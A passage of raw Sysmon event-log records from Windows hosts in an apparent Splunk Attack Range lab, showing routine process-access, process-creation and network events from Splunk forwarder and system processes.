09:22:25.341{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D4831C61676E01AC61C82045B20F6D3,SHA256=F444121903CCC004DA7AD0133A5DC79507F8F0BB5E691C0F7E63F5627448E899,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000980969Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:25.825{69CF5F33-8D51-6151-0D7A-00000000FD01}3840580C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980968Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:25.653{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8D51-6151-0D7A-00000000FD01}3840C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980967Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:25.653{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980966Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:25.653{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980965Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:25.653{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980964Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:25.653{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980963Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:25.653{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980962Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:25.653{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980961Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:25.653{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980960Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:25.653{69CF5F33-7F27-614D-0500-00000000FD01}408980C:\Windows\system32\csrss.exe{69CF5F33-8D51-6151-0D7A-00000000FD01}3840C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000980959Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:25.653{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980958Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:25.653{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980957Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:25.653{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8D51-6151-0D7A-00000000FD01}3840C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000980956Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:25.638{69CF5F33-8D51-6151-0D7A-00000000FD01}3840C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000980955Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:25.060{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78C3A8BBB54C62E914AA770C68DD9DA4,SHA256=25EC0644656D1671F4DECD225CE82AC270ECA47E08534945FA80A45CFD444871,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001056235Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:25.100{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54220-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001056234Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:26.576{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D9E8B9A9FFD18CBBCA87F8CED66C09EC,SHA256=2B4AAA40CC39FB3AF95DD3753CB0DAC2716DB75165AEF53D8917572CA98C66FD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000980999Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:26.950{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8D52-6151-0F7A-00000000FD01}2812C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980998Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:26.950{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980997Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:26.950{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980996Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:26.950{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980995Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:26.950{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980994Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:26.950{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980993Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:26.950{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980992Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:26.950{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980991Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:26.950{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980990Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:26.950{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980989Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:26.950{69CF5F33-7F27-614D-0500-00000000FD01}408980C:\Windows\system32\csrss.exe{69CF5F33-8D52-6151-0F7A-00000000FD01}2812C:\Program 